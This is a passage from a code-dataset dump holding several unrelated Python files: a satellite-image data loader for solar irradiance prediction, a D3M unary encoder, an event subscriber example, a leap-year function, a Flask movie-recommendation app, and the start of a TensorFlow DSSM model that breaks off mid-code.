x_coord, y_coord = [\n map_coord_to_pixel(\n lat, lat_min, lat_res), map_coord_to_pixel(\n lon, lon_min, lon_res)]\n station_coords[sta] = [y_coord, x_coord]\n\n samples = np.array(samples)\n print(\"sample shape:\", samples.shape)\n\n for station_i in config.STATION_NAMES:\n # station_i = 'FPK'\n if row[[station_i + \"_GHI\"]].isnull()[0]:\n # print(\"[INFO] GHI is null for station \", station_i)\n continue\n elif row[[station_i + \"_DAYTIME\"]][0] == 0:\n # print(\"[INFO] Night for station \", station_i)\n continue\n # print(station_i)\n\n y.append(row[station_i + \"_GHI\"])\n # ini = time.time()\n # print(station_coords)\n x.append(crop_station_image(station_i, samples, station_coords))\n # print(\"cropping time: \", time.time()-ini)\n return x, y\n\n# crop station image from satellite image of size CROP_SIZE\n\n# gets station information and returns crops\ndef crop_station_image(station_i, sat_image, station_coords):\n\n # R! check crop correct positions? 
and also if lower origin needs to be\n # taken before manual cropping\n\n crop_size = args.CROP_SIZE\n\n # fig,ax = plt.subplots(1)\n # ax.imshow(sat_image[0], cmap='bone')\n # rect = Rectangle((station_coords[station_i][0]-(crop_size//2),station_coords[station_i][1]-(crop_size//2)),crop_size,crop_size,linewidth=1,fill=True,edgecolor='r',facecolor='none')\n # ax.add_patch(rect)\n # plt.scatter(station_coords[station_i][0],station_coords[station_i][1])\n # plt.savefig(\"check_crop.png\")\n\n # print(\"in crop station image: \", station_coords[station_i][1]-(crop_size//2),\" - \" , (station_coords[station_i][1]+(crop_size//2)))\n margin = crop_size // 2\n lat_mid = station_coords[station_i][1]\n lon_mid = station_coords[station_i][0]\n crop = sat_image[\n :,\n lat_mid - margin:lat_mid + margin,\n lon_mid - margin:lon_mid + margin,\n ]\n\n if crop.shape != (5, crop_size, crop_size):\n print(\"[WARNING] crop channels shape:\", station_i,\n [crop[i].shape for i in range(len(crop))])\n\n # plt.imshow(crop[0], cmap='bone')\n # plt.savefig(\"check_cropped.png\")\n\n return crop\n\n\nclass SimpleDataLoader(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=(tf.float32, tf.float32)\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n STEP_SIZE = args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 3 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n\n for index in tqdm(range(START_IDX, END_IDX, STEP_SIZE)):\n # while(index < len(catalog)):\n\n rows = catalog[index: index + STEP_SIZE]\n # print(rows)\n\n if args.debug:\n profiler = LineProfiler()\n profiled_func = profiler(station_from_row)\n try:\n profiled_func(args, rows, x, y)\n finally:\n profiler.print_stats()\n profiler.dump_stats('data_loader_dump.txt')\n else:\n x, y = station_from_row(args, rows)\n\n x = np.array(x)\n y = np.array(y)\n print(\n \"Yielding x (shape) and y (shape) of index: \",\n index,\n x.shape,\n y.shape)\n\n yield (x, y)\n\n\ndef store_numpy(ndarray_dict, filepath):\n os.makedirs('npz_store', exist_ok=True)\n path = os.path.splitext(os.path.basename(filepath))[0] + \".npz\"\n path = os.path.join('npz_store', path)\n np.savez(path, **ndarray_dict)\n\n\ndef store_pickle(ndarray_dict, filepath):\n os.makedirs('pickle_store', exist_ok=True)\n path = os.path.splitext(os.path.basename(filepath))[0] + \".dat\"\n path = os.path.join('pickle_store', path)\n # np.savez(path, **ndarray_dict)\n with open(path, 'wb') as outfile:\n pickle.dump(ndarray_dict, outfile, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef load_pickle(filepath):\n path = os.path.splitext(os.path.basename(filepath))[0] + \".dat\"\n path = os.path.join('pickle_store', path)\n # np.savez(path, **ndarray_dict)\n with open(path, 'rb') as infile:\n ndarray_dict = pickle.load(infile)\n return ndarray_dict\n\n\ndef load_numpy(filepath):\n path = os.path.splitext(os.path.basename(filepath))[0] + \".npz\"\n path = os.path.join('npz_store', path)\n ndarray_dict = np.load(path)\n return ndarray_dict\n\n# generates t0-1 and t0 data\n\n\nclass SequenceDataLoader(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=(tf.float32, tf.float32)\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n unique_paths = pd.unique(catalog['hdf5_8bit_path'].values.ravel())\n print(unique_paths)\n STEP_SIZE = 1 # 
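# crop_station_image above takes a fixed window around the station pixel; the
# same centre-crop as a standalone sketch with synthetic data. It also shows
# why the shape check after the slice is needed: near the border the start
# index goes negative, NumPy treats it as an offset from the far edge, and an
# empty axis comes back instead of a padded crop.
import numpy as np

crop_size = 64
margin = crop_size // 2
image = np.zeros((5, 650, 1500))  # (channels, rows, cols), synthetic

def center_crop(img, row, col):
    return img[:, row - margin:row + margin, col - margin:col + margin]

print(center_crop(image, 300, 700).shape)  # (5, 64, 64): window fully inside
print(center_crop(image, 10, 700).shape)   # (5, 0, 64): 10 - 32 = -22 wraps around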
args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 100 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n\n for path in tqdm(unique_paths):\n\n samples = fetch_all_samples_hdf5(args, path)\n\n # grouping by paths\n grouped = catalog[path == catalog.hdf5_8bit_path]\n offsets_1 = {} # T0 - 1\n offsets_0 = {} # T0\n example_pairs = {}\n for station in args.station_data.keys():\n df = grouped[grouped.station == station]\n argsort = np.argsort(df['hdf5_8bit_offset'].values)\n offsets_1[station] = df['hdf5_8bit_offset'].values[argsort]\n offsets_0[station] = offsets_1[station] + 4\n\n # if offsets+4 offset exists, we create pairs using those\n # offsets+4 since T0-1 exists by definition\n matching_offsets = np.intersect1d(\n offsets_1[station], offsets_0[station])\n # pairs = zip(matching_offsets-4,matching_offsets)\n GHI_pairs = zip(df[df.hdf5_8bit_offset.isin(matching_offsets - 4)].GHI.values,\n df[df.hdf5_8bit_offset.isin(matching_offsets)].GHI.values)\n offset_pairs = zip(matching_offsets - 4, matching_offsets)\n\n example_pairs[station] = zip(offset_pairs, GHI_pairs)\n # print(example_pairs)\n for station, ex_pair in example_pairs.items():\n # for offset,GHI in ex_pair:\n for (offset_1, offset_0), (GHI_1, GHI_0) in ex_pair:\n # for a in ex_pair:\n # print(list(offset))\n img_1 = samples[station][offset_1]\n img_0 = samples[station][offset_0]\n yield (img_1, img_0), (GHI_1, GHI_0)\n\n# generates t0-1 and t0 data\n\n\nclass SequenceDataLoaderMemChunks(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n if args.k_sequences == 0:\n output_shapes = (\n tf.TensorShape(\n (None, None, None)), tf.TensorShape(\n (args.future_ghis + 1, )))\n else:\n output_shapes = (\n tf.TensorShape(\n (None, None, None, None)), tf.TensorShape(\n (args.future_ghis + 1, )))\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=((tf.float32, tf.float32, tf.float32), tf.float32),\n # output_shapes=output_shapes\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n unique_paths = pd.unique(catalog['hdf5_8bit_path'].values.ravel())\n # print(unique_paths)\n STEP_SIZE = 1 # args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 100 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n counter = 0\n\n k_sequences = args.k_sequences # in the past, addition to T0\n img_sequence_step = args.img_sequence_step\n GHI_sequence_steps = [4, 8, 12] # in the future, in addition to T0\n GHI_sequence_steps_reverse = [24, 20, 12, 0][-(args.future_ghis + 1):]\n GHI_sequence_steps = GHI_sequence_steps[:args.future_ghis]\n # GHI_sequence_steps.reverse()\n for i in range(1):\n for path in tqdm(unique_paths):\n\n # samples = fetch_all_samples_hdf5(args,path)\n # store_numpy(samples,path)\n samples = load_numpy(path)\n # continue\n # grouping by paths\n grouped = catalog[path == catalog.hdf5_8bit_path]\n offsets_1 = {} # T0 - 1\n offsets_0 = {} # T0\n example_pairs = {}\n offsets_list = []\n for station in args.station_data.keys():\n df = grouped[grouped.station == station]\n argsort = np.argsort(df['hdf5_8bit_offset'].values)\n offsets_1[station] = df['hdf5_8bit_offset'].values[argsort]\n offsets_0[station] = offsets_1[station] + img_sequence_step\n matching_offsets_imgs = df['hdf5_8bit_offset'].values[argsort]\n for i in range(k_sequences):\n matching_offsets_imgs = np.intersect1d(\n matching_offsets_imgs, matching_offsets_imgs + img_sequence_step)\n # offsets_plus_1[station] = 
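# The pairing trick the sequence loaders here rely on, in isolation: an offset
# can serve as T0 only if the offset one step earlier also exists, and
# np.intersect1d finds exactly those offsets by intersecting the available
# offsets with the same array shifted forward (synthetic offsets, step of 4
# as in the code above):
import numpy as np

offsets = np.array([0, 4, 8, 20, 24, 32])
step = 4

t0 = np.intersect1d(offsets, offsets + step)  # offsets whose T0-1 exists: [4 8 24]
pairs = list(zip(t0 - step, t0))              # [(0, 4), (4, 8), (20, 24)]
print(pairs)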
offsets_1[station] + 8\n\n # if offsets+4 offset exists, we create pairs using those offsets+4 since T0-1 exists by definition\n # matching_offsets_imgs = np.intersect1d(offsets_1[station],offsets_0[station])\n # pairs = zip(matching_offsets-4,matching_offsets)\n\n # For GHIs\n matching_offsets_GHIs = matching_offsets_imgs\n for GHI_sequence_step in GHI_sequence_steps:\n matching_offsets_GHIs = np.intersect1d(\n matching_offsets_GHIs, matching_offsets_GHIs + GHI_sequence_step)\n # matching_offsets_GHIs = np.intersect1d(matching_offsets_imgs, matching_offsets_imgs + GHI_sequence_step)\n\n GHI_pairs_list = []\n CS_GHI_pairs_list = []\n for i, GHI_sequence_step in enumerate(\n GHI_sequence_steps_reverse):\n GHI_pairs_list.append(df[df.hdf5_8bit_offset.isin(\n matching_offsets_GHIs - GHI_sequence_step)].GHI.values)\n CS_GHI_pairs_list.append(df[df.hdf5_8bit_offset.isin(\n matching_offsets_GHIs - GHI_sequence_step)].CLEARSKY_GHI.values)\n\n GHI_pairs = zip(*GHI_pairs_list)\n CS_GHI_pairs = zip(*CS_GHI_pairs_list)\n\n # import pdb\n # pdb.set_trace()\n iso_dt = df[df.hdf5_8bit_offset.isin(\n matching_offsets_imgs)]['iso-datetime'].tolist()\n date_time_attrs = [get_datetime_attrs(dt) for dt in iso_dt]\n # for images\n # offset_pairs = zip(matching_offsets-4,matching_offsets)\n offsets_pairs_list = []\n for i in range(k_sequences):\n offsets_pairs_list.append(\n matching_offsets_imgs - (k_sequences + i))\n offsets_pairs_list.append(matching_offsets_imgs)\n offset_pairs = zip(*offsets_pairs_list)\n # offset_pairs = zip(matching_offsets_imgs - img_sequence_step, matching_offsets_imgs)\n\n # example_pairs[station] = zip(offset_pairs,GHI_pairs)\n sample = samples[station]\n example_pair = zip(\n offset_pairs, date_time_attrs, CS_GHI_pairs, GHI_pairs)\n # for (offset_1,offset_0),(GHI_0,GHI_plus_1) in\n # example_pair:\n for offsets, date_time_pair, CS_GHIs, GHIs in example_pair:\n imgs = []\n for offset in offsets:\n img = sample[offset].swapaxes(0, 1).swapaxes(1, 2)\n imgs.append(img)\n # img_1 = sample[offset_1].swapaxes(0,1).swapaxes(1,2)\n # img_0 = sample[offset_0].swapaxes(0,1).swapaxes(1,2)\n if args.k_sequences == 0:\n imgs = imgs[0]\n if args.use_metadata:\n a = (imgs, date_time_pair, CS_GHIs)\n # print(\"shape:\",tf.shape(a))\n # import pdb\n # pdb.set_trace()\n yield (imgs, date_time_pair, CS_GHIs), (GHIs)\n else:\n yield imgs, GHIs\n # yield (img_1,img_0),(GHI_0)\n # print(example_pairs)\n\n\ndef iterate_and_fetch_all_samples_hdf5(args, paths):\n for path in paths:\n samples = fetch_all_samples_hdf5(args, path)\n store_numpy(samples, path)\n # store_pickle(samples,path)\n # load_numpy(path)\n # load_pickle(path)\n print(\"stored %s\" % path)\n\n# generates t0-1 and t0 data\n\n\nclass SequenceDataLoaderThreaded(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=(tf.float32, tf.float32)\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n unique_paths = pd.unique(catalog['hdf5_8bit_path'].values.ravel())\n print(unique_paths)\n STEP_SIZE = 1 # args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 100 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n\n # Create a mechanism for monitoring when all threads are finished.\n coord = tf.train.Coordinator()\n num_threads = 5\n threads = []\n\n unique_paths = unique_paths.tolist()\n size = len(unique_paths)\n\n for thread_index in range(num_threads):\n from_ = size // num_threads * 
(thread_index)\n upto = size // num_threads * (thread_index + 1)\n args1 = (args, unique_paths[from_:upto])\n t = threading.Thread(\n target=iterate_and_fetch_all_samples_hdf5, args=args1)\n t.start()\n threads.append(t)\n\n # Wait for all the threads to terminate.\n coord.join(threads)\n print(\"exiting\")\n return\n\n# loads dataset and iterates over dataframe rows as well as hdf5 and nc\n# files for processing\n\n\ndef load_dataset(args):\n catalog = load_catalog(args.data_catalog_path)\n catalog = pre_process(catalog)\n\n sdl = SimpleDataLoader(\n args, catalog).prefetch(\n tf.data.experimental.AUTOTUNE).cache()\n\n for epoch in range(args.epochs):\n # iterate over epochs\n print(\"Epoch: %d\" % epoch)\n for i, j in sdl:\n print(i.shape, j.shape)\n # print(\"Incoming x and y: \", i,j)\n\n# loads dataset and iterates over dataframe rows as well as hdf5 and nc\n# files for processing\n\n\ndef load_dataset_seq(args):\n catalog = load_catalog(args.data_catalog_path)\n\n sdl = SequenceDataLoaderThreaded(args, catalog)\n # sdl = SequenceDataLoaderMemChunks(args, catalog)\n # sdl = sdl.map(lambda x,y: (x,y), num_parallel_calls=4)\n sdl = sdl.prefetch(tf.data.experimental.AUTOTUNE)\n\n for epoch in range(args.epochs):\n # iterate over epochs\n print(\"Epoch: %d\" % epoch)\n for (img_1, img_0), (GHI_1, GHI_0) in sdl:\n # print(img_1.shape,img_0.shape)\n pass\n\n\ndef extract_at_time(time, ctlg):\n pass\n\n\ndef create_data_loader():\n pass\n\n\ndef data_loader_main():\n args = init_args()\n load_dataset_seq(args)\n\n\nif __name__ == \"__main__\":\n data_loader_main()\n","sub_path":"utilities/dataloader2.py","file_name":"dataloader2.py","file_ext":"py","file_size_in_byte":22454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"48483895","text":"import pandas as pd # type: ignore\nimport numpy as np # type: ignore\nimport copy\nimport typing\n\nimport d3m\nfrom d3m.primitive_interfaces.unsupervised_learning import UnsupervisedLearnerPrimitiveBase\nfrom d3m.metadata import hyperparams, params\nfrom d3m.primitive_interfaces.base import CallResult\n\nfrom . import config\n\nInput = d3m.container.DataFrame\nOutput = d3m.container.DataFrame\n\nclass Params(params.Params):\n mapping : typing.Dict\n all_columns : typing.Set[str]\n empty_columns : typing.List\n textmapping : typing.Dict\n target_columns : typing.List[int]\n\n\nclass UEncHyperparameter(hyperparams.Hyperparams):\n text2int = hyperparams.UniformBool(\n default=True,\n description='Whether to convert everything to numerical. 
For text columns, each row may get converted into a column',\n semantic_types=['http://schema.org/Boolean',\n 'https://metadata.datadrivendiscovery.org/types/ControlParameter'])\n targetColumns = hyperparams.Hyperparameter[typing.List[int]](\n default=[],\n description='List of indices of columns to be encoded',\n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter',\n 'https://metadata.datadrivendiscovery.org/types/TabularColumn']\n )\n\n## reference: https://github.com/scikit-learn/scikit-learn/issues/8136\nclass Label_encoder(object):\n def __init__(self):\n self.class_index = None\n\n def fit_pd(self, df, cols=[]):\n '''\n fit all columns in the df or specific list.\n generate a dict:\n {feature1:{label1:1,label2:2}, feature2:{label1:1,label2:2}...}\n '''\n if len(cols) == 0:\n cols = df.columns\n self.class_index = {}\n for f in cols:\n uf = df[f].unique()\n self.class_index[f] = {}\n index = 1\n for item in uf:\n self.class_index[f][item] = index\n index += 1\n\n def transform_pd(self,df,cols=[]):\n '''\n transform all columns in the df or specific list from lable to index, return and update dataframe.\n '''\n newdf = copy.deepcopy(df)\n if len(cols) == 0:\n cols = df.columns\n for f in cols:\n if f in self.class_index:\n newdf[f] = df[f].apply(lambda d: self.__update_label(f,d))\n return newdf\n\n def get_params(self):\n return self.class_index\n\n def set_params(self, textmapping):\n self.class_index = textmapping\n\n def __update_label(self,f,x):\n '''\n update the label to index, if not found in the dict, add and update the dict.\n '''\n try:\n return self.class_index[f][x]\n except:\n self.class_index[f][x] = max(self.class_index[f].values())+1\n return self.class_index[f][x]\n\n\nclass UnaryEncoder(UnsupervisedLearnerPrimitiveBase[Input, Output, Params, UEncHyperparameter]):\n\n metadata = hyperparams.base.PrimitiveMetadata({\n \"id\": \"DSBox-unary-encoder\",\n \"version\": config.VERSION,\n \"name\": \"DSBox Unary Data Encoder\",\n \"description\": \"Encode using unary code for orinal data\",\n \"python_path\": \"d3m.primitives.dsbox.UnaryEncoder\",\n \"primitive_family\": \"DATA_CLEANING\",\n \"algorithm_types\": [ \"ENCODE_ONE_HOT\" ],\n \"source\": {\n \"name\": config.D3M_PERFORMER_TEAM,\n \"uris\": [ config.REPOSITORY ]\n },\n ### Automatically generated\n # \"primitive_code\"\n # \"original_python_path\"\n # \"schema\"\n # \"structural_type\"\n ### Optional\n \"keywords\": [ \"preprocessing\", \"encoding\"],\n \"installation\": [ config.INSTALLATION ],\n #\"location_uris\": [],\n #\"precondition\": [],\n #\"effects\": [],\n #\"hyperparms_to_tune\": []\n })\n\n def __repr__(self):\n return \"%s(%r)\" % ('UnaryEncoder', self.__dict__)\n\n\n def __init__(self, *, hyperparams: UEncHyperparameter) -> None:\n super().__init__(hyperparams=hyperparams)\n\n self.hyperparams = hyperparams\n\n self._text2int = hyperparams['text2int']\n self._target_columns = hyperparams['targetColumns']\n self._textmapping: typing.Dict = dict()\n self._mapping: typing.Dict = dict()\n self._all_columns: typing.Set = set()\n self._empty_columns: typing.List = []\n\n self._training_inputs = None\n self._fitted = False\n\n\n def get_params(self) -> Params:\n\n # Hack to work around pytypes bug. 
Covert numpy int64 to int.\n for key in self._mapping.keys():\n self._mapping[key] = [np.nan if np.isnan(x) else int(x) for x in self._mapping[key]]\n\n param = Params(mapping=self._mapping, all_columns=self._all_columns, empty_columns=self._empty_columns,\n textmapping=self._textmapping, target_columns = self._target_columns)\n return param\n\n\n def set_params(self, *, params: Params) -> None:\n self._fitted = True\n self._mapping = params['mapping']\n self._all_columns = params['all_columns']\n self._empty_columns = params['empty_columns']\n self._textmapping = params['textmapping']\n self._target_columns = params['target_columns']\n\n\n def set_training_data(self, *, inputs: Input) -> None:\n self._training_inputs = inputs\n self._fitted = False\n #self._target_columns = targets\n\n\n def fit(self, *, timeout:float = None, iterations: int = None) -> None:\n \"\"\"\n Need training data from set_training_data first.\n The encoder would record specified columns to encode and column values to\n unary encode later in the produce step.\n \"\"\"\n if self._fitted:\n return\n\n if self._training_inputs is None:\n raise ValueError('Missing training(fitting) data.')\n\n data_copy = self._training_inputs.copy()\n\n self._all_columns = set(data_copy.columns)\n\n # mapping\n if self._target_columns and max(self._target_columns) > len(data_copy.columns)-1:\n raise ValueError('Target columns are not subset of columns in training_inputs.(Out of range).')\n\n idict = {}\n for target_id in self._target_columns:\n name = data_copy.columns[target_id]\n col = data_copy[name]\n idict[name] = sorted(col.unique())\n self._mapping = idict\n\n if self._text2int:\n texts = data_copy.drop(self._mapping.keys(),axis=1)\n texts = texts.select_dtypes(include=[object])\n le = Label_encoder()\n le.fit_pd(texts)\n self._textmapping = le.get_params()\n\n self._fitted = True\n\n\n def __encode_column(self, col):\n unary = pd.DataFrame(col)\n for v in self._mapping[col.name]:\n unary[col.name+\"_\"+str(v)] = (col >= v).astype(int)\n return unary.drop(col.name,axis=1)\n\n\n def produce(self, *, inputs: Input, timeout:float = None, iterations: int = None) -> CallResult[Output]:\n \"\"\"\n Convert and output the input data into unary encoded format,\n using the trained (fitted) encoder.\n Value unseen in training_inputs would be rounded to nearest value in training_inputs.\n Missing(NaN) cells in a column one-hot encoded would give\n out a row of all-ZERO columns for the target column.\n \"\"\"\n #if self._target_columns == []:\n # return CallResult(inputs, True, 1)\n\n if not self._fitted:\n raise ValueError('Encoder model not fitted. 
Use fit()')\n\n        if isinstance(inputs, pd.DataFrame):\n            data_copy = inputs.copy()\n        else:\n            data_copy = inputs[0].copy()\n\n        set_columns = set(data_copy.columns)\n\n        if set_columns != self._all_columns:\n            raise ValueError('Columns(features) fed at produce() differ from fitted data.')\n\n        data_enc = data_copy[list(self._mapping.keys())]\n        data_else = data_copy.drop(self._mapping.keys(),axis=1)\n\n        res = []\n        for column_name in data_enc:\n            col = data_enc[column_name]\n            col.is_copy = False\n\n            chg_v = lambda x: min(self._mapping[col.name], key=lambda a:abs(a-x)) if x is not None else x\n            col[col.notnull()] = col[col.notnull()].apply(chg_v)\n            encoded = self.__encode_column(col)\n            res.append(encoded)\n\n        data_else.drop(self._empty_columns, axis=1, inplace=True)\n        if self._text2int:\n            texts = data_else.select_dtypes([object])\n            le = Label_encoder()\n            le.set_params(self._textmapping)\n            data_else[texts.columns] = le.transform_pd(texts)\n\n        res.append(data_else)\n        result = pd.concat(res, axis=1)\n\n        return CallResult(result, True, 1)\n","sub_path":"dsbox/datapreprocessing/cleaner/unary_encoder.py","file_name":"unary_encoder.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614753400","text":"import logging\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\n\n\nimport json, time\nfrom gces import tools\nfrom gces import (\n    EventSubscriber\n)\n\nfrom celery_app import example_run_subscriber_task\n\ndef example_run_subscriber_function(data):\n    pass\n\nTOPIC_NAME = 'gces'\nSUBSCRIBER_NAME = 'gces_example'\n\n\nes = EventSubscriber(TOPIC_NAME, SUBSCRIBER_NAME)\nes.register_fsub('EXAMPLE_RUN_FUNCTION_PROCCESS', example_run_subscriber_function)\nes.register_tsub('EXAMPLE_RUN_TASK_PROCCESS', example_run_subscriber_task)\n\nes.start()\n\nif __name__ == '__main__':\n    try:\n        while True:\n            time.sleep(200)\n    except KeyboardInterrupt:\n        print('Bye!!!!')\n","sub_path":"examples/task_based_sub/sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"97136793","text":"# -*- coding: utf-8 -*-\nu\"\"\"A module which provides the is_leap_year function.\"\"\"\n\n\ndef is_leap_year(year):\n    u\"\"\"Return a boolean indicating if the given year is a leap\n    year.\n    \"\"\"\n    if year % 4 == 0:\n        if year % 100 == 0:\n            return year % 400 == 0\n        return True\n    return False\n","sub_path":"all_data/exercism_data/python/leap/018ac9310c554d3a8faddf3859c47987.py","file_name":"018ac9310c554d3a8faddf3859c47987.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337550660","text":"from flask import Blueprint\nmain = Blueprint('main', __name__)\n \nimport json\nfrom engine import RecommendationEngine\n \nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n \nfrom flask import Flask, render_template, request, session, redirect, url_for, Response, send_file\n\n\n@main.route('/',methods=['GET', 'POST'])\ndef index():\n    if request.method == 'POST':\n        movieName = request.form.get('movieName')\n        res = recommendation_engine.queryMovie(movieName)\n        return render_template('result.html', moviename = movieName, search_res = res)\n    return render_template('search.html') \n\n@main.route('/info/<movie_id>')\ndef movieInfo(movie_id):\n    rating = 
recommendation_engine.get_average_rating_for_movie_id(movie_id)\n    #return json.dumps(rating)\n    return render_template('details.html',score = round(rating[0][1][1],2),num = rating[0][1][0], movie_id = movie_id)\n\n@main.route(\"/<user_id>/ratings/top/<count>\", methods=[\"GET\"])\ndef top_ratings(user_id, count):\n    logger.debug(\"User %s TOP ratings requested\", user_id)\n    top_ratings = recommendation_engine.get_top_ratings(user_id,count)\n    return render_template('recommendation.html', movies = top_ratings)\n    #return json.dumps(top_ratings)\n \n@main.route(\"/<user_id>/ratings/<movie_id>\", methods=[\"GET\"])\ndef movie_ratings(user_id, movie_id):\n    logger.debug(\"User %s rating requested for movie %s\", user_id, movie_id)\n    ratings = recommendation_engine.get_ratings_for_movie_ids(user_id, [movie_id])\n    return json.dumps(ratings)\n    #return render_template('details.html',score = rating, movie_id = movie_id)\n\n@main.route(\"/<user_id>/rating/<movie_id>\", methods = [\"POST\"])\ndef add_rating(user_id,movie_id):\n    rating = [(user_id, (int)(movie_id), (int)(request.form.get('score')))]\n    recommendation_engine.add_ratings(rating)\n    return redirect(\"/0/rated\")\n\n@main.route(\"/<user_id>/rated\")\ndef rated(user_id):\n    rated_movies = recommendation_engine.get_rated_movies(user_id)\n    return render_template('rated.html', rated = rated_movies)\n    #return json.dumps(rated_movies)\n \n@main.route(\"/<user_id>/ratings\", methods = [\"POST\"])\ndef add_ratings(user_id):\n    # get the ratings from the Flask POST request object\n    ratings_list = request.form.keys()[0].strip().split(\"\\n\")\n    ratings_list = map(lambda x: x.split(\",\"), ratings_list)\n    # create a list with the format required by the engine (user_id, movie_id, rating)\n    ratings = map(lambda x: (user_id, int(x[0]), float(x[1])), ratings_list)\n    # add them to the model using the engine API\n    recommendation_engine.add_ratings(ratings)\n    \n    return json.dumps(ratings)\n    \n\ndef create_app(spark_context, dataset_path):\n    global recommendation_engine \n\n    recommendation_engine = RecommendationEngine(spark_context, dataset_path)    \n    \n    app = Flask(__name__, static_url_path='/static')\n    app.register_blueprint(main)\n    return app    \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"440569170","text":"import jwt\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.utils.safestring import mark_safe\nimport json\nfrom user.models import LoggedUser\nfrom user.redis import Redis\nfrom .models import Message\n\nred = Redis()\n\n\ndef index(request):\n    \"\"\"\n    :param request: request is made by user\n    :return: will render token which will be stored in web browser\n    \"\"\"\n    try:\n        token = request.body.decode(\"utf-8\")\n        decode = jwt.decode(token, settings.SECRET_KEY)\n        username = decode['username']\n        user = User.objects.get(username=username)\n        # if user is not none then code will run\n        if user is not None:\n            logged_user = LoggedUser.objects.all().order_by('username')\n            userlist = []\n            for i in logged_user:\n                userlist.append(i.username)\n            data = {\n                \"token\": token,\n                \"username\": user,\n                \"userlist\": userlist\n            }\n            return render(request, 'chat/index.html',data)\n    except Exception as e:\n        return redirect(\"/session\")\n\n\ndef room(request, room_name):\n    \"\"\"\n    :param request: user makes a request\n    :param room_name: room name is called from index\n    :return: will return the chat room page\n    \"\"\"\n    
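# The token handling shared by index() above and room() below, reduced to its
# core: decode the JWT with the server-side secret, then use the username
# claim to look up the user. A standalone sketch with PyJWT; the secret and
# claims are made up, and unlike the code here it pins the signing algorithm
# explicitly, which newer PyJWT versions require.
import jwt

SECRET_KEY = 'not-the-real-secret'  # stand-in for settings.SECRET_KEY

token = jwt.encode({'username': 'alice'}, SECRET_KEY, algorithm='HS256')
claims = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
print(claims['username'])  # 'alice' - this value drives User.objects.get(...)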
if request.method == 'POST':\n token = request.body.decode('utf-8')\n decode = jwt.decode(token, settings.SECRET_KEY)\n username = decode['username']\n user = User.objects.get(username=username)\n # if user is not none then code will run\n if user is not None:\n userlist = []\n logged_user = LoggedUser.objects.all().order_by('username')\n for i in logged_user:\n userlist.append(i.username)\n return render(request, 'chat/room.html', {\n 'room_name_json': mark_safe(json.dumps(room_name)),\n 'user': user,\n 'userlist': userlist\n })\n else:\n return redirect(\"/session\")\n else:\n mess = Message.objects.filter(indentifier_message_number=room_name).values('messages')\n m = list(mess)\n return render(request, 'chat/room.html', {\n 'room_name_json': room_name,\n 'messages': mark_safe(json.dumps(m))\n })\n","sub_path":"myapp/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"534457103","text":"#coding:utf8\nimport sys\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom flags import *\n\nclass DSSM(object):\n\n def __init__(self):\n self._build_model()\n\n def _build_model(self):\n with tf.name_scope('input'):\n # shape : [batch_size, query_length]\n self.query = tf.placeholder(tf.int32, shape=[None, FLAGS.query_length], name=\"query\") \n # shape: [batch_size, doc_length]\n self.doc = tf.placeholder(tf.int32, shape=[None, FLAGS.doc_length], name=\"doc\")\n # shape : [batch_size, 1]\n self.label = tf.placeholder(tf.float32, shape=[None, 1], name='label')\n\n with tf.name_scope('embedding'):\n # shape : [vocab_size, embedding_dim]\n self.embedding = tf.Variable(tf.random_uniform([FLAGS.vocab_size, FLAGS.embedding_dim]), dtype=tf.float32, name=\"embedding\")\n\n # shape: [batch_size, query_length, embedding_dim]\n self.query_embeddings = tf.nn.embedding_lookup(self.embedding, self.query, name=\"query_embeddings\")\n self.doc_embeddings = tf.nn.embedding_lookup(self.embedding, self.doc, name=\"doc_embeddings\")\n\n with tf.name_scope('mask'):\n # mask query input\n self.query_mask = tf.cast(tf.greater(self.query, 0), tf.float32)\n self.query_mask = tf.expand_dims(self.query_mask, axis=2)\n self.query_mask = 